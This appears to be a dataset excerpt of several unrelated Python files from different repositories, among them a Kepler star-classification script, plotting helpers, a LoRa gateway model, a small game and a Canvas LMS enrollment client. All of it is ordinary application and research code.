#print int(s2.kepid[0]), s2.kepmag[0], s2.teff[0], s2.logg[0], s2.radius[0], s2.range[0], s2.rmsmdv[0], s2.mdv3[0], s2.mdv6[0], s2.mdv12[0], s2.mdv24[0], s2.mdv48[0], s2.mdv4d[0], s2.mdv8d[0], s2.npk[0], s2.maxpkht[0], s2.maxper[0], s2.maxflx[0], s2.sndht[0], s2.sndper[0], s2.sndflx[0], s2.np3d[0], s2.np9d[0], s2.nsigpks[0], s2.rms4[0], s2.cdpp3[0], s2.cdpp6[0], s2.cdpp12[0], s2.pdcvar[0], s2.crowd[0]
print len(s.teff)
n1 = len([x for x in s.teff if x>0])
print n1
for i in range(0,n1):
if s.teff[i]>0 and s.cdpp3[i]==0: n1 = n1-1
print n1
n1 = 151797
n2 = n1 + len([x for x in s2.teff if x>0])
print n2
for i in range(n1,n2):
if s2.teff[i-n1]>0 and s2.cdpp3[i-n1]==0: n2 = n2-1
print n2
dataset = np.empty([n2,30])
i=0
j=0
while i<n1:
if s.teff[j]>0 and s.cdpp3[j]!=0:
dataset[i,0] = s.kepid[j]
dataset[i,1] = s.kepmag[j]
dataset[i,2] = s.teff[j]
dataset[i,3] = s.logg[j]
dataset[i,4] = s.radius[j]
dataset[i,5] = s.range[j]
dataset[i,6] = s.rmsmdv[j]
dataset[i,7] = s.mdv3[j]
dataset[i,8] = s.mdv6[j]
dataset[i,9] = s.mdv12[j]
dataset[i,10] = s.mdv24[j]
dataset[i,11] = s.mdv48[j]
dataset[i,12] = s.mdv4d[j]
dataset[i,13] = s.mdv8d[j]
dataset[i,14] = s.npk[j]
dataset[i,15] = s.maxpkht[j]
dataset[i,16] = s.maxper[j]
dataset[i,17] = s.maxflx[j]
dataset[i,18] = s.sndht[j]
dataset[i,19] = s.sndper[j]
dataset[i,20] = s.sndflx[j]
dataset[i,21] = s.np3d[j]
dataset[i,22] = s.np9d[j]
dataset[i,23] = s.nsigpks[j]
dataset[i,24] = s.rms4[j]
dataset[i,25] = s.cdpp3[j]
dataset[i,26] = s.cdpp6[j]
dataset[i,27] = s.cdpp12[j]
dataset[i,28] = s.pdcvar[j]
dataset[i,29] = s.crowd[j]
i=i+1
j=j+1
if i>152780:
print i,j
print s.kepid[j]
print dataset[i]
print dataset[895]
i=n1
j=0
while i<n2:
if s2.teff[j]>0 and s2.cdpp3[j]!=0:
dataset[i,0] = s2.kepid[j]
dataset[i,1] = s2.kepmag[j]
dataset[i,2] = s2.teff[j]
dataset[i,3] = s2.logg[j]
dataset[i,4] = s2.radius[j]
dataset[i,5] = s2.range[j]
dataset[i,6] = s2.rmsmdv[j]
dataset[i,7] = s2.mdv3[j]
dataset[i,8] = s2.mdv6[j]
dataset[i,9] = s2.mdv12[j]
dataset[i,10] = s2.mdv24[j]
dataset[i,11] = s2.mdv48[j]
dataset[i,12] = s2.mdv4d[j]
dataset[i,13] = s2.mdv8d[j]
dataset[i,14] = s2.npk[j]
dataset[i,15] = s2.maxpkht[j]
dataset[i,16] = s2.maxper[j]
dataset[i,17] = s2.maxflx[j]
dataset[i,18] = s2.sndht[j]
dataset[i,19] = s2.sndper[j]
dataset[i,20] = s2.sndflx[j]
dataset[i,21] = s2.np3d[j]
dataset[i,22] = s2.np9d[j]
dataset[i,23] = s2.nsigpks[j]
dataset[i,24] = s2.rms4[j]
dataset[i,25] = s2.cdpp3[j]
dataset[i,26] = s2.cdpp6[j]
dataset[i,27] = s2.cdpp12[j]
dataset[i,28] = s2.pdcvar[j]
dataset[i,29] = s2.crowd[j]
i=i+1
j=j+1
q=8
logdata = np.log10(dataset)
testdata = np.empty([n2,q])
plotdata = np.empty([n2,q])
plotdata[:,0] = dataset[:,2] #teff
plotdata[:,1] = dataset[:,3] #logg
plotdata[:,2] = logdata[:,15] #maxpkht
plotdata[:,3] = logdata[:,18] #sndht
plotdata[:,4] = logdata[:,16] #maxper
plotdata[:,5] = logdata[:,19] #sndper
plotdata[:,6] = logdata[:,5] #range
plotdata[:,7] = logdata[:,24] #rms4
np.save('../data/dataset',dataset)
np.save('../data/logdata',logdata)
#s.range = s.range/s.totf
j=0
for i in [2,3,15,18,16,19,5,24]:
mean = np.mean(logdata[:,i])
std = np.mean(logdata[:,i])
testdata[:,j] = (logdata[:,i]-mean)/std
j=j+1
teff = dataset[:,2]
rrlyrae = [5520878, 3733346, 5299596, 6070714, 6100702, 6763132, 6936115, 7176080]
rtest = [7742534, 7988343, 8344381, 9508655, 9591503, 9947026, 10789273, 11802860]
instrip = [2571868, 2987660, 3629496, 5356349, 5437206, 6668729, 7304385, 7974841, 8018827, 8324268]
itest = [8351193, 8489712, 8915335, 9291618, 9351622, 10537907, 10974032, 11572666, 11874676, 12153021]
detached = [1026032, 1026957, 1433962, 1571511, 1725193, 1996679, 2010607, 2162635, 2162994, 2305372, 2305543, 2306740]
dtest = [2308957, 2309587, 2309719, 2437452, 2438070, 2440757, 2442084, 2445134, 2447893, 2556127, 2557430, 2576692]
semidet = [4947528, 4949770, 5077994, 5120793, 5211385, 5215999, 5218441, 5374999, 5471619, 5774375, 5785586, 5792093, 5809827]
sdtest = [5823121, 6283224, 6302051, 6353203, 6432059, 6606653, 6669809, 6692340, 6836140, 6852488, 6865626, 6962901, 7031714]
overcontact = [7821450, 7830460, 7835348, 7839027, 7871200, 7877062, 7878402, 7879404, 7881722, 7889628, 7950962, 7973882, 7977261]
octest = [8004839, 8035743, 8039225, 8053107, 8108785, 8111387, 8122124, 8143757, 8177958, 8190491, 8190613, 8192840, 8241252]
ellipsoid = [9848190, 9898401, 9909497, 9948201, 10028352, 10030943, 10032392, 10123627, 10135584, 10148799, 10155563, 10285770, 10288502, 10291683, 10351735, 10417135]
eltest = [10481912, 10600319, 10619506, 10855535, 11135978, 11336707, 11572643, 11714337, 11722816, 11751847, 11825204, 11875706, 12055421, 12059158, 12121738, 12166770]
uncertain = [9237533, 9347868, 9347955, 9456920, 9469350, 9480516, 9532591, 9596355, 9655187, 9713664, 9716456, 9724080]
utest = [9724220, 9832227, 9835416, 9874575, 9964422, 10086746, 10264744, 10350225, 10388897, 10556068, 10684673, 10799558]
#candidate = [1027438, 1161345, 1431122, 1432214, 1432789, 1717722, 1718189, 1718958, 1721157, 1724719, 1725016, 1849702, 1865042, 1871056, 1872821, 1995519, 1996180, 2141783, 2142522, 2161536, 2162635, 2164169, 2165002, 2302548, 2303903, 2304320, 2306756, 2307199, 2307415, 2309719, 2438264, 2438513, 2439243, 2441495, 2442448, 2444412, 2449431]
#falsepos = [892772, 1026957, 1433962, 1571511, 1722276, 1996679, 2157247, 2166206, 2309585, 2438070, 2440757, 2441151, 2441728, 2445129, 2445154, 2446113, 2452450]
num = 100
sunlike = [0]*num
kdwarf = [0]*num
giant = [0]*num
other = [0]*num
stest = [0]*num
ktest = [0]*num
gtest = [0]*num
otest = [0]*num
sun=0
kdw=0
gnt=0
oth=0
j=0
while 1:
if 3500<=teff[j]<=5100 and (s.logg[j]>=4.2 or s.logg[j]>=(2.2+0.0005*teff[j])):
if kdw<100: kdwarf[kdw] = dataset[j,0]
elif kdw<200: ktest[kdw-100] = dataset[j,0]
kdw = kdw+1
elif 5600<=teff[j]<=5900:
if sun<100: sunlike[sun] = dataset[j,0]
elif sun<200: stest[sun-100] = dataset[j,0]
sun = sun+1
elif 0<s.logg[j]<=(6.0-0.0004*teff[j]) and s.logg[j]<=4.0 and teff[j]>0:
if gnt<100: giant[gnt] = dataset[j,0]
elif gnt<200: gtest[gnt-100] = dataset[j,0]
gnt = gnt+1
elif teff[j]>0:
if oth<100: other[oth] = dataset[j,0]
elif oth<200: otest[oth-100] = dataset[j,0]
oth = oth+1
if kdw>=200 and sun>=200 and gnt>=200 and oth>=200: break
j = j+1
#p = len(rrlyrae + instrip + detached + semidet + overcontact + ellipsoid + uncertain + sunlike + kdwarf + giant + other)
#kidlist = [other, sunlike, kdwarf, giant, rrlyrae, instrip, detached, semidet, overcontact, ellipsoid, uncertain]
#testlist = [otest, stest, ktest, gtest, rtest, itest, dtest, sdtest, octest, eltest, utest]
p = len(rrlyrae + instrip + detached + semidet + overcontact + ellipsoid + uncertain)
kidlist = [rrlyrae, instrip, detached, semidet, overcontact, ellipsoid, uncertain]
testlist = [rtest, itest, dtest, sdtest, octest, eltest, utest]
col=np.empty([p],dtype='S10')
training = np.empty([p,q])
pd = np.empty([p,q])
h = 0
for i in kidlist:
for j in i:
#print h, j
temp = testdata[np.where(dataset[:,0]==j)[0][0]]
temp2 = plotdata[np.where(dataset[:,0]==j)[0][0]]
for k in range(0,q):
training[h,k] = temp[k]
for k in range(0,q):
pd[h,k] = temp2[k]
if i==instrip: col[h] = 'blue'
elif i==detached: col[h] = 'cyan'
elif i==sunlike: col[h] = 'white'
elif i==kdwarf: col[h] = 'white'
elif i==giant: col[h] = 'white'
elif i==other: col[h] = 'white'
elif i==rrlyrae: col[h] = 'magenta'
elif i==semidet: col[h] = 'green'
elif i==overcontact: col[h] = 'yellow'
elif i==ellipsoid: col[h] = 'orange'
elif i==uncertain: col[h] = 'red'
h = h+1
h=0
sampletest = np.empty([p,q])
pdtest = np.empty([p,q])
coltest=np.empty([p],dtype='S10')
for i in testlist:
for j in i:
#print h, j
temp = testdata[np.where(dataset[:,0]==j)[0][0]]
temp2 = plotdata[np.where(dataset[:,0]==j)[0][0]]
for k in range(0,q):
sampletest[h,k] = temp[k]
for k in range(0,q):
pdtest[h,k] = temp2[k]
if i==itest: coltest[h] = 'blue'
elif i==dtest: coltest[h] = 'cyan'
elif i==stest: coltest[h] = 'yellow'
elif i==ktest: coltest[h] = 'orange'
elif i==gtest: coltest[h] = 'red'
elif i==otest: coltest[h] = 'white'
elif i==rtest: coltest[h] = 'magenta'
elif i==sdtest: coltest[h] = 'green'
elif i==octest: coltest[h] = 'yellow'
elif i==eltest: coltest[h] = 'orange'
elif i==utest: coltest[h] = 'red'
h = h+1
#q = len([x for x in testdata if x[0]>0])
'''
q=5000
i=0
j=0
sampletest = np.empty([q,n])
pdtest = np.empty([q,m])
#col=np.empty([q],dtype='S10')
while i<len(sampletest):
if testdata[j,0] > -10 and j>10000:
sampletest[i] = testdata[j]
pdtest[i] = plotdata[j]
i=i+1
j=j+1
'''
sample = training
'''
sample2 = np.empty([len(sample),q])
for i in range(0,q):
temp = sample[:,i].argsort()
sample2[:,i] = np.arange(len(sample[:,i]))[temp.argsort()]
sample2 = sample2/len(sample)
'''
print np.shape(sample)
fig = pl.figure(1)
pl.clf()
'''
colors = itertools.cycle('bgrcmybgrcmybgrcmybgrcmy')
for k, col in zip(set(labels), colors):
for index in class_members:
x = testdata[:,index]
pl.plot(x[0], x[1], 'o', markerfacecolor=col,
markeredgecolor=col, markersize=1)
pl.plot(0,0)
pl.show()
i=1
while i<=1:
clf = KMeans(n_clusters=i, max_iter=1, random_state=0)
clf.fit(sample)
'''
X_train = training
y_train = col
X_test = sampletest
y_test = coltest
gnb = naive_bayes.GaussianNB()
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
n=0
for i in range(0,len(y_pred)):
if y_pred[i] != y_test[i]:
#print i, y_pred[i], y_test[i]
n = n+1
print n, 1.0 - n*1.0/len(y_test)
'''
@pickle_results('forest.pkl')
def compute_forest(depth):
rms_test = np.zeros(len(depth))
rms_train = np.zeros(len(depth))
i_best = 0
clf = RandomForestClassifier(n_estimators=1, max_depth=5,
min_samples_split=1, random_state=0)
stuff = clf.fit(rms_train)
stuff = clf.apply(rms_test)
print stuff
compute_forest([0,1,2,3,4])
for i, d in enumerate(depth):
clf = RandomForestClassifier(n_estimators=10, max_depth=d,
min_samples_split=1, random_state=0)
stuff = cross_val_score(clf, rms_test, rms_train)
print stuff
'''
'''
def onpick(event):
ind=event.ind
s1 = ax1.scatter(X[ind,0],X[ind,1],c=col[ind],lw=1,s=36)
s2 = ax2.scatter(pd[ind,0],pd[ind,1],c=col[ind],lw=1,s=36)
s3 = ax3.scatter(pd[ind,4],pd[ind,5],c=col[ind],lw=1,s=36)
s4 = ax4.scatter(pd[ind,6],pd[ind,7],c=col[ind],lw=1,s=36)
pl.ion()
pl.draw()
s1.set_visible(False)
s2.set_visible(False)
s3.set_visible(False)
s4.set_visible(False)
'''
ax1 = pl.subplot(221,axisbg='black')
ax1.scatter(pdtest[:,0],pdtest[:,1],c=y_pred,lw=0,s=7,picker=True)
#ax1.scatter(sample[:,0],sample[:,1],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(2000,12000)
#pl.ylim(0,6)
pl.xlabel('T_eff')
pl.ylabel('log(g)')
ax2 = pl.subplot(222,axisbg='black')
ax2.scatter(pdtest[:,2],pdtest[:,3],c=y_pred,lw=0,s=7,picker=True)
#ax2.scatter(sample[:,2],sample[:,3],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-1,4)
#pl.ylim(-1,3.5)
pl.xlabel('log-first peak height')
pl.ylabel('log-second peak height')
ax3 = pl.subplot(223,axisbg='black')
ax3.scatter(pdtest[:,4],pdtest[:,5],c=y_pred,lw=0,s=7,picker=True)
#ax3.scatter(sample[:,4],sample[:,5],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-1.5,2.5)
#pl.ylim(-1.5,2.5)
pl.xlabel('log-first peak period (d)')
pl.ylabel('log-second peak period (d)')
ax4 = pl.subplot(224,axisbg='black')
ax4.scatter(pdtest[:,6],pdtest[:,7],c=y_pred,lw=0,s=7,picker=True)
#ax4.scatter(sample[:,6],sample[:,7],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-4,2)
#pl.ylim(-3,3)
pl.xlabel('log-amplitude')
pl.ylabel('RMS deviation')
'''
ax1 = pl.subplot(221, axisbg='black')
ax1.scatter(X[:,0],X[:,1],c=col,s=7,lw=0,picker=True)
fig.canvas.mpl_connect('pick_event',onpick)
pl.xlabel('component 1')
pl.ylabel('component 2')
ax2 = pl.subplot(223, sharex=ax1, axisbg='black')
ax2.scatter(X[:,0],X[:,2],c=col,s=7,lw=0)
pl.xlabel('component 1')
pl.ylabel('component 3')
ax3 = pl.subplot(224, sharey=ax2, axisbg='black')
ax3.scatter(X[:,1],X[:,2],c=col,s=7,lw=0)
pl.xlabel('component 2')
'''
pl.show()
| 2.140625 | 2 |
neural_network/drawbox.py | PurdueMINDS/SAGA | 1 | 12796802 | # Copyright 2018 <NAME>, <NAME>, <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Draw plots"""
import os
import math
import numpy as np
import pandas as pd
# forbid GUI
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
# /**
# * Multi Plots Container
# */
class EqualGridFigure(object):
"""Distribute all axes with similar attributes with grids of same size
It can have multi axes in one figure, but all axes will have the same height and width,
so they should describe data of similar attribute.
"""
def __init__(self, num_rows, num_cols, ax_height, ax_width, title=None, font_size=None):
super(EqualGridFigure, self).__init__()
# global settings
if not font_size is None: mpl.rcParams.update({'font.size': font_size})
# figure size
self.num_rows = num_rows
self.num_cols = num_cols
self.fig, self.axes = plt.subplots(
num_rows, num_cols,
figsize=(ax_width * num_cols, max(ax_height * num_rows, 20)))
# figure title
if not title is None:
if font_size is None: self.fig.suptitle(title)
else: self.fig.suptitle(title, fontsize=font_size * 2)
# buffer for each plot
self.cnt = [[0 for cl in range(self.num_cols)] for rw in range(self.num_rows)]
def __getitem__(self, idx_pair):
assert len(idx_pair) == 2
row_id, col_id = idx_pair
if self.num_rows == 1:
if self.num_cols == 1: return self.axes
else: return self.axes[col_id]
else:
if self.num_cols == 1: return self.axes[row_id]
else: return self.axes[row_id][col_id]
def close(self):
plt.close(self.fig)
def subtitle(self, row_id, col_id, subtitle,
x_label=None, y_label=None):
"""Set ax title
Args
----
row_id, col_id : int
indices to specify the exact ax
subtitle : str
title for specified ax
x_label : str
title for x-axis
y_label : str
title for y-axis
"""
ax = self[row_id, col_id]
ax.set_title(subtitle)
if x_label is not None: ax.set_xlabel(x_label)
if y_label is not None: ax.set_ylabel(y_label)
def save_fig(self, path, close=True):
"""Save figure of all axes
Args
----
path : str
path to save the figure
close : bool
if close figure after saving
"""
dirname = os.path.dirname(path)
_, extname = os.path.splitext(path)
extname = extname[1:]
if not os.path.isdir(dirname): os.makedirs(dirname)
self.fig.savefig(path, format=extname, dpi='figure')
if close: self.close()
def lineplot(self, row_id, col_id, x_data, y_data,
label=None, color=None, alpha=None, marker=None, linestyle=None,
vmin=None, vmax=None):
"""Line plot
Args
----
row_id, col_id : int
indices to specify the exact ax
x_data, y_data : <1D-array-like>
data for x-axis and y-axis
label : str
label of data
color : str
specify color to plot
marker : str
point style to plot
linestyle : str
line style to plot
vmin : float
min value of data to plot
vmax : float
max value of data to plot
Draw a line in ax (row_id, col_id).
It can draw a line on ax which already has something.
"""
ax = self[row_id, col_id]
# settings
label = label or 'Line {}'.format(self.cnt[row_id][col_id])
color = color or 'C{}'.format(self.cnt[row_id][col_id])
alpha = alpha or 1
marker = marker or ','
linestyle = linestyle or '-'
ax.plot(x_data, y_data, label=label, \
color=color, alpha=alpha, \
marker=marker, \
linewidth=6.0, linestyle=linestyle)
if vmin: ax.set_ylim(ymin=vmin)
if vmax: ax.set_ylim(ymax=vmax)
self.cnt[row_id][col_id] += 1
def legend(self):
"""Place legend"""
for rw in range(self.num_rows):
for cl in range(self.num_cols):
ax = self[rw, cl]
if self.cnt[rw][cl] > 1: ax.legend()
| 2.796875 | 3 |
plugins/tasks_plugin/__init__.py | shivammmmm/querybook | 1,144 | 12796803 | # from tasks.delete_mysql_cache import delete_mysql_cache
# delete_mysql_cache
| 1.046875 | 1 |
HW1/election_count.py | profrichto/handson | 0 | 12796804 | import mediacloud, datetime
#Default key: The variable 'key' must be edited according to the specific mediacloud user
key = '00'
mc = mediacloud.api.MediaCloud(key)
#Comparison of number of stories written about 'Trump' and 'Clinton' in September 2016
res = mc.sentenceCount('Trump', solr_filter=[mc.publish_date_query( datetime.date( 2016, 9, 1), datetime.date( 2016, 10, 1) ), 'tags_id_media:1' ])
res2 = mc.sentenceCount('Clinton', solr_filter=[mc.publish_date_query( datetime.date( 2016, 9, 1), datetime.date( 2016, 10, 1) ), 'tags_id_media:1' ])
person = 'Trump' if res['count'] > res2['count'] else 'Clinton'
print 'The US Mainstream Media sources talked more about', person, 'in the September 2016.'
| 2.59375 | 3 |
db/tables/Base.py | Wanket/RnD-py | 0 | 12796805 | <gh_stars>0
from sqlalchemy.orm import declarative_base
class Base(declarative_base()):
__abstract__ = True
| 1.664063 | 2 |
arjuna/interact/http/model/internal/repr/response.py | bhargavkumar-65/arjuna | 13 | 12796806 | <filename>arjuna/interact/http/model/internal/repr/response.py
# This file is a part of Arjuna
# Copyright 2015-2021 <NAME>
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna.tpi.helper.arjtype import CIStringDict
from arjuna.interact.http.model.internal.processor.response import HttpExpectedResProcessor, HttpUnexpectedResProcessor
class HttpResponseYamlRepr:
def __init__(self, action, resp_yaml):
self.__xproc = None
self.__unexproc = None
if "unexpected" in resp_yaml:
self.__unexproc = HttpUnexpectedResProcessor(action._endpoint.service, CIStringDict(resp_yaml["unexpected"]))
del resp_yaml["unexpected"]
self.__xproc = HttpExpectedResProcessor(action._endpoint.service, CIStringDict(resp_yaml))
def validate(self, response):
if self.__xproc:
self.__xproc.validate(response)
if self.__unexproc:
self.__unexproc.validate(response)
| 1.914063 | 2 |
UServer/userver/object/gateway.py | soybean217/lora-python | 0 | 12796807 | from database.db0 import db0, ConstDB
from database.db3 import db3, ConstDB3
from utils.errors import KeyDuplicateError, ReadOnlyDeny
from utils.utils import eui_64_to_48, eui_48_to_64
from binascii import hexlify
from enum import Enum
import enum
from userver.frequency_plan import FrequencyPlan
from userver.object.asserts import Assertions
from userver.user.models import User
from sqlalchemy import Column, String, BINARY
from sqlalchemy import orm, ForeignKey
from database.db_sql import db_sql
import eviltransform
class Platform(Enum):
rpi = 'Raspberry Pi'
rpi3 = 'Raspberry Pi 3'
linklabs = 'LinkLabs'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Platform), '%r is not a valid Platform' % value
class Model(Enum):
imst = 'IMST'
linklabs = 'LinkLabs'
menthink = 'MenThink'
risinghf = 'RisingHF'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Model), '%r is not a valid Model' % value
class Field:
id = 'id'
mac_addr = 'mac_addr'
name = 'name'
platform = 'platform'
model = 'model'
freq_plan = 'freq_plan'
public = 'public'
disable = 'disable'
time = 'time'
lng = 'lng'
lat = 'lat'
alt = 'alt'
location = 'location'
user_id = 'user_id'
restart = 'restart'
class Location:
_assert_switcher = {Field.lng: Assertions.a_float,
Field.lat: Assertions.a_float,
Field.alt: Assertions.a_int, }
def __setattr__(self, key, value):
self._assert_switcher[key](value)
self.__dict__[key] = value
def __init__(self, lng, lat, alt):
self.lng = lng
self.lat = lat
self.alt = alt
self.switch_wgs2gcj()
def __str__(self):
return '%s,%s,%s' % (self.lng, self.lat, self.alt)
def obj_to_dict(self):
info = {}
for key, value in self.__dict__.items():
if key in (Field.lng, Field.lat, Field.alt):
info[key] = value
return info
def switch_wgs2gcj(self):
self.lat, self.lng = eviltransform.wgs2gcj(self.lat, self.lng)
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Location), '%r is not a valid Location' % value
class objects:
@staticmethod
def str_to_obj(string):
string = string.split(',')
try:
return Location(float(string[0]), float(string[1]), int(string[2]))
except Exception as error:
raise error
class Gateway(db_sql.Model):
redis_fields = (Field.user_id, Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.location)
__vars_can_write = (Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.name, Field.location)
_assert_switcher = {
Field.user_id: Assertions.a_not_negative_int,
Field.id: Assertions.a_eui_64,
Field.mac_addr: Assertions.a_eui_48,
Field.name: Assertions.a_str,
Field.platform: Platform.assert_isinstanceof,
Field.freq_plan: FrequencyPlan.assert_isinstanceof,
Field.model: Model.assert_isinstanceof,
Field.public: Assertions.a_bool,
Field.disable: Assertions.a_bool,
Field.restart: Assertions.a_bool,
Field.location: Location.assert_isinstanceof,
Field.time: Assertions.a_int,
}
__table_args__ = {'schema': 'nwkserver'}
__tablename__ = 'gateway'
id = Column(BINARY(8), primary_key=True)
name = Column(String(50))
user_id = db_sql.Column(db_sql.Integer(), ForeignKey(User.id, ondelete='CASCADE', onupdate='CASCADE'), nullable=False)
@orm.reconstructor
def init_on_load(self):
self.mac_addr = eui_64_to_48(self.id)
info = db0.hgetall(ConstDB.gateway + hexlify(self.id).decode())
self.freq_plan = FrequencyPlan(info[b'freq_plan'].decode())
self.public = bool(int(info[b'public']))
self.disable = bool(int(info[b'disable']))
self.platform = Platform[info[b'platform'].decode()]
self.model = Model[info[b'model'].decode()]
location = info.get(b'location')
if location is not None:
self.location = Location.objects.str_to_obj(location.decode())
else:
self.location = Location(0.0, 0.0, 0)
time = db3.get(ConstDB3.T_GATEWAY + hexlify(self.id).decode())
if time is not None:
self.time = int(time)
def __setattr__(self, key, value):
try:
attr = getattr(self, key)
if attr is not None and key not in self.__vars_can_write:
raise ReadOnlyDeny
except AttributeError:
pass
if key in self._assert_switcher:
self._assert_switcher[key](value)
super.__setattr__(self, key, value)
def __init__(self, user_id, mac_addr, name, platform, model, freq_plan=FrequencyPlan.EU863_870, public=True, disable=False, location=None):
"""
:param id: 8 bytes
:param name: str
:param platform: Platform
:return:
"""
self.user_id = user_id
self.id = eui_48_to_64(mac_addr)
self.name = name
self.platform = platform
self.freq_plan = freq_plan
self.public = public
self.disable = disable
self.model = model
if location is not None:
self.location = location
else:
self.location = Location(0.0, 0.0, 0)
def _zip_vars(self):
return dict(zip(self.redis_fields,
(self.user_id, self.platform.name, self.model.name, self.freq_plan.value, self.public.real, self.disable.real, str(self.location))))
def _zip_vars_can_write(self):
dd = {}
for field in self.redis_fields:
if field in self.__vars_can_write:
value = getattr(self, field)
if isinstance(value, enum.Enum):
value = value.value if field == Field.freq_plan else value.name
elif isinstance(value, bool):
value = value.real
dd[field] = value
return dd
def send_restart_request(self):
db0.hset(ConstDB.gateway + hexlify(self.id).decode(), 'restart', 1)
def save(self):
db_sql.session.add(self)
id_str = hexlify(self.id).decode()
key = ConstDB.gateway + id_str
if db0.exists(key):
raise KeyDuplicateError(key)
db0.hmset(key, self._zip_vars())
#save to sql
db_sql.session.commit()
db_sql.session.registry.clear()
def update(self):
print(self._zip_vars_can_write())
db0.hmset(ConstDB.gateway + hexlify(self.id).decode(), self._zip_vars_can_write())
db_sql.session.commit()
def delete(self):
db_sql.session.delete(self)
db_sql.session.commit()
# delete from sql
id = hexlify(self.id).decode()
gateway_trans = db0.keys(pattern=ConstDB.trans_params + '*' + id)
pipe = db0.pipeline()
for key in gateway_trans:
key = key.decode()
pipe.delete(key)
dev_eui = key.split(":")[1]
pipe.zrem(ConstDB.dev_gateways + dev_eui, self.id)
pipe.delete(ConstDB.gateway + id)
pipe.delete(ConstDB.gateway_pull + id)
pipe.execute()
def obj_to_dict(self):
dd = {
'id': hexlify(self.id).decode().upper(),
'mac_addr': hexlify(self.mac_addr).decode().upper(),
'name': self.name,
'platform': self.platform.value,
'model': self.model.value,
'freq_plan': self.freq_plan.value,
'public': self.public,
'disable': self.disable,
'location': self.location.obj_to_dict(),
}
if hasattr(self, 'time'):
dd['last_data'] = self.time
self.get_pull_info()
if hasattr(self, 'ip_addr'):
dd['ip'] = self.ip_addr
if hasattr(self, 'prot_ver'):
dd['ver'] = self.prot_ver
return dd
def get_pull_info(self):
key = ConstDB.gateway_pull + hexlify(self.id).decode()
info = db0.hgetall(key)
if info:
self.ip_addr = info[b'ip_addr'].decode()
self.prot_ver = int(info[b'prot_ver'])
if __name__ == '__main__':
print(Model('IMST')) | 2.046875 | 2 |
okteam/tsurka.py | o-fedorov/okteam | 0 | 12796808 | <gh_stars>0
from typing import Tuple
from pgzero.builtins import Actor
from pygame import Vector2
from .settings import ANIMATION_SPEED, HEIGHT, SPEED, WALK_IMAGES, WIDTH
_TIME = 0.0
ALL = {}
X = Vector2(1, 0)
Y = Vector2(0, 1)
def add(direction: Tuple[int, int]):
actor = Actor(WALK_IMAGES[0])
ALL[actor] = Vector2(direction)
return actor
add((1, 0)).midright = (WIDTH, HEIGHT / 2)
add((0, 1)).midbottom = (WIDTH / 2, HEIGHT)
def draw():
for actor in ALL:
actor.draw()
def update(dt):
global _TIME
_TIME += dt
for actor in ALL:
update_one(actor, dt)
def update_one(actor, dt):
image_num = int(_TIME * ANIMATION_SPEED) % len(WALK_IMAGES)
actor.image = WALK_IMAGES[image_num]
if not image_num:
return
direction = ALL[actor]
delta = direction * SPEED * dt
if actor.left + delta.x <= 0 or actor.right + delta.x >= WIDTH:
ALL[actor] = direction.reflect(X)
delta = delta.reflect(X)
if actor.top + delta.y <= 0 or actor.bottom + delta.y >= HEIGHT:
ALL[actor] = direction.reflect(Y)
delta = delta.reflect(Y)
actor.x += delta.x
actor.y += delta.y
| 2.859375 | 3 |
mission_control/navigator_missions/__init__.py | saltyan007/kill_test | 0 | 12796809 | print "i amde it"
from nodes.mission_planner import MissionPlanner | 0.980469 | 1 |
src/ol_openedx_canvas_integration/client.py | MAbdurrehman12/open-edx-plugins | 0 | 12796810 | import logging
import pytz
from urllib.parse import urlencode, urljoin, urlparse, parse_qs
import requests
from django.conf import settings
from ol_openedx_canvas_integration.constants import DEFAULT_ASSIGNMENT_POINTS
log = logging.getLogger(__name__)
class CanvasClient:
def __init__(self, canvas_course_id):
self.session = self.get_canvas_session()
self.canvas_course_id = canvas_course_id
@staticmethod
def get_canvas_session():
"""
Create a request session with the access token
"""
session = requests.Session()
session.headers.update({
"Authorization": "Bearer {token}".format(token=settings.CANVAS_ACCESS_TOKEN)
})
return session
@staticmethod
def _add_per_page(url, per_page):
"""
Add per_page query parameter to override default value of 10
Args:
url (str): The url to update
per_page (int): The new per_page value
Returns:
str: The updated URL
"""
pieces = urlparse(url)
query = parse_qs(pieces.query)
query['per_page'] = per_page
query_string = urlencode(query, doseq=True)
pieces = pieces._replace(query=query_string)
return pieces.geturl()
def _paginate(self, url, *args, **kwargs):
"""
Iterate over the paginated results of a request
"""
url = self._add_per_page(url, 100) # increase per_page to 100 from default of 10
items = []
while url:
resp = self.session.get(url, *args, **kwargs)
resp.raise_for_status()
items.extend(resp.json())
links = requests.utils.parse_header_links(resp.headers["link"])
url = None
for link in links:
if link["rel"] == "next":
url = link["url"]
return items
def list_canvas_enrollments(self):
"""
Fetch canvas enrollments. This may take a while, so don't run in the request thread.
Returns:
dict: Email addresses mapped to canvas user ids for all enrolled users
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/enrollments".format(course_id=self.canvas_course_id)
)
enrollments = self._paginate(url)
return {
enrollment["user"]["login_id"].lower(): enrollment["user"]["id"]
for enrollment in enrollments
}
